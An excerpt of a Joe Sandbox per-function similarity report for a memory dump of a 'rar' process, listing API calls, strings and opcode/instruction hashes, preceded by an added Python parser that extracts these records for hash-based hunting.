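Every record in this section uses the same bullet layout (an optional APIs or Strings list, then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity), which makes the hashes easy to pull out mechanically for hunting across reports. The parser below is an added example and not Joe Sandbox code. It reads that layout into records, resolves the hex image base from the Source File line, strips the "Download File" link text that HTML extraction glues onto the Associated dump names, flags whether Opcode ID repeats the Opcode Fuzzy Hash (it does on every complete record above), and splits API String ID into two decimal halves. That split rests on an assumption: on each record here the left half is 0 exactly when API ID is empty and the right half is 0 exactly when String ID is empty, so the value is read as api-hash followed by string-hash. SAMPLE is a constructed excerpt of the CreateFile/DeviceIoControl record and the CMT string record from this page, with call-argument lists shortened and the Associated list cut to one line.

```python
"""Parse Joe Sandbox per-function 'Similarity' records (added example, not
Joe Sandbox code). It relies only on the bullet layout visible in this report:
optional 'APIs'/'Strings' list, 'Memory Dump Source', 'Joe Sandbox IDA Plugin',
'Similarity'. SAMPLE is a constructed excerpt of two records from this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

BULLET = "\u2022 "  # the report's "• " list marker
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+).*?ref: (?P<ref>[0-9A-Fa-f]+)$")

SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000), ref: 00007FF69A403AC4
• DeviceIoControl.KERNEL32 ref: 00007FF69A403B55
• CloseHandle.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000), ref: 00007FF69A403B60
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CreateFile$CloseControlDeviceHandle
• String ID:
• API String ID: 998109204-0
• Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
• Instruction ID: 4566933cc88c5b4649eb0bdf2032a1763a3afd74f1ec0689b6add1ef3c27b7dc
• Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
• Instruction Fuzzy Hash: 7F31A136618B8086E7708F11B44469AB7E4FB89BF4F010275EAA993BD8CF3CD4558B00
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Similarity
• API ID:
• String ID: CMT
• API String ID: 0-2756464174
• Opcode ID: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
• Instruction ID: 6c6b1aacc031529cf0edede90031124f01b8fb712732304453f3ab9daa8f9c1e
"""

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)        # (name, module, ref) per 'APIs' bullet
    strings: list = field(default_factory=list)     # raw 'Strings' bullets
    associated: list = field(default_factory=list)  # associated dump names
    fields: dict = field(default_factory=dict)      # every other 'Label: value' bullet

    def api_names(self) -> list:
        return [name for name, _, _ in self.apis]

    def base_offset(self) -> int:
        """Image base parsed from 'Source File: <dump>, Offset: <hex>, based on PE: ...'."""
        m = re.search(r"Offset: ([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return int(m[1], 16) if m else 0

    def api_string_id(self) -> tuple:
        """'API String ID' is read as '<api hash>-<string hash>' (assumption, see lead-in)."""
        a, _, s = self.fields.get("API String ID", "0-0").partition("-")
        return int(a or 0), int(s or 0)

    def opcode_id_is_fuzzy_hash(self) -> Optional[bool]:
        """True when Opcode ID repeats Opcode Fuzzy Hash; None if no fuzzy hash line."""
        fuzzy = self.fields.get("Opcode Fuzzy Hash")
        return None if fuzzy is None else fuzzy == self.fields.get("Opcode ID")

def parse_entries(text: str) -> list:
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            # Every record ends with its Similarity block, so an APIs/Strings
            # header seen after one opens the next record.
            if cur is None or (line in ("APIs", "Strings") and section == "Similarity"):
                if cur is not None:
                    entries.append(cur)
                cur = FunctionEntry()
            section = line
        elif cur is not None and line.startswith(BULLET):
            item = line[len(BULLET):]
            if section == "APIs":
                m = API_RE.match(item)  # lines that do not match keep the bare name
                cur.apis.append((m["name"], m["module"], int(m["ref"], 16)) if m
                                else (item.split(".", 1)[0], "", None))
            elif section == "Strings":
                cur.strings.append(item)
            else:
                label, _, value = item.partition(":")
                if label == "Associated":
                    # HTML extraction glues the "Download File" link text onto the dump name
                    cur.associated.append(value.strip().removesuffix("Download File"))
                else:
                    cur.fields[label.strip()] = value.strip()
    if cur is not None:
        entries.append(cur)
    return entries

def entries_calling(entries, api_name: str) -> list:
    """Records whose API list names api_name, e.g. every DeviceIoControl caller."""
    return [e for e in entries if api_name in e.api_names()]
```

`entries_calling(parse_entries(text), "DeviceIoControl")` is the kind of query that turns a report this size into a short list of functions worth opening in the disassembler; `opcode_id_is_fuzzy_hash()` returning None marks records that were cut off, like the CMT one, so they are not mistaken for functions without a fuzzy hash.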
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                                                                                                      • Opcode ID: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                                                                                      • Instruction ID: 6c6b1aacc031529cf0edede90031124f01b8fb712732304453f3ab9daa8f9c1e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDD1BF62A1869282EA30EB25E4501BD73E1FF95B80F6446F5DA9EC76D5DE3CE941C300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A448704
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A444E3C: GetCurrentProcess.KERNEL32(00007FF69A449CC5), ref: 00007FF69A444E69
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                                                                      • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                      • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                      • Instruction ID: aaac96cce1adfb60730f1d3fdca3935ff2ab87dc3f9d446063419a09c46a0441
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E251BE62F15B9685EB20DFA298104AD77E4FB58FD8B4445B2DE1D97B89EF3CE0428301
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                      • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                      • Instruction ID: 63127c6714b977a0797b16ff183bba0a9115af4158c31ef2f11bfb9035c432c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15111972B14A418EEB208FB5E4912AE77B0FB48B48F40157ADA8E93B58DF3CD145CB00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                      • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                      • Instruction ID: 0554ac33247dc6f447664dce2013fc49c0aa21e34ddcf5654b90599d41568b48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F05E21B1878183F3208F26B44052AB7E4FB89BD4F1881B8EA89D3B58DF7CC9518B00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction ID: d4e3970708b1905539ebb13cb3ae336a642a74d197aa4002f08a0636b51f0b9a
• Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction Fuzzy Hash: 3B014C62A2868187EB70DB15E4413EA73E0FB99B44F8005B1E6CDC6688DF3CE644CF40
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction ID: a0c33f8de72f85a3c36793d9995220905df2b6345ffa8fd44ff83a7b9d9ca575
• Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction Fuzzy Hash: CF419C72A09B4599E720CF65E8417AE37E4FB08B98F0055BAEE9C87B55DE3CD025C344
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Console$Mode$Handle$Readfflush
• String ID:
• API String ID: 1039280553-0
• Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction ID: 375b06f97b16a0c6c1a41ca6d72871eac3a9aafa020f9a702c8ab83d81cff305
• Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction Fuzzy Hash: 8B218029A186439BFA209F25E80457D73A1FBCAFA1F1412F5EE4A83764DE3CE546C700
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
• Instruction ID: eb13fdb3a25fb6ab9dc2032b3c07c8ea47c15d4538f0366164b927fe5135819b
• Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
• Instruction Fuzzy Hash: 74819522A09A8286EB71DA11E6443BD73D0EB94F94F1445F1DB8D87B99DF7CE9468300
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
                                                                                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                      • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                      • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                      • Instruction ID: e77bb15eac4cf3a18516fd20348f0b7307e5a3f9066c205ce9fd358450cc1525
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB02BE22B1868286EA74DA3592453FE73D1EF51B80F1404F9DA8ECB782DF7DE8558381
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FileMoveNamePath$CompareLongShortStringswprintf
• String ID: rtmp%d
• API String ID: 2308737092-3303766350
• Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
• Instruction ID: 3e4c80ea38a0c90feb824d354e1725848a62c3fd5b3b2b6f426f7a87eba6365d
• Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
• Instruction Fuzzy Hash: 5F517C62A18A9645EB70AB25D8005FE72D0FF62F84F5110F1DD0ECBA9ADF28E605D740
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
• Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction ID: 0e3e500477e23e5f333d47fcf3466ed7701376224b8ddb094d9d8ba664452d2c
• Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction Fuzzy Hash: C5016D28A59A07C6FB35EB75B85823533E1EF89F01F4814F1D94EC62A0CE3C614AC741
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 667068680-1824683568
• Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction ID: 92f3b5176a87dca5f6ce3b4dd5dc60132287bf80eb37c1d611c2641efeb16a7d
• Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction Fuzzy Hash: B3F01925A0AB4681EA64DB12F85407573A0EF8AFC0B4C60F0ED1ECB724EE2CE546C300
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: +$-
• API String ID: 3215553584-2137968064
• Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction ID: 1c6c773e58b68be3e069f4da5f271763d2e36337e523cb87435f1807b167ed28
• Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction Fuzzy Hash: 2A12A066E0D58386FBB49E59D0446B976D6EF00F64FD842F2D69AC36C0EF2CE6918304
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2092471728-0
                                                                                                                                                                                                                                      • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                      • Instruction ID: 044e71026c42828ec41423c63c99d6951b1c656e002630675ce3018d31ce2fc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E51863661874586EB70CF15E84016A77E5FB89B98F2002B9EA9DC3B98DF3DD544CB00
                                                                                                                                                                                                                                      APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
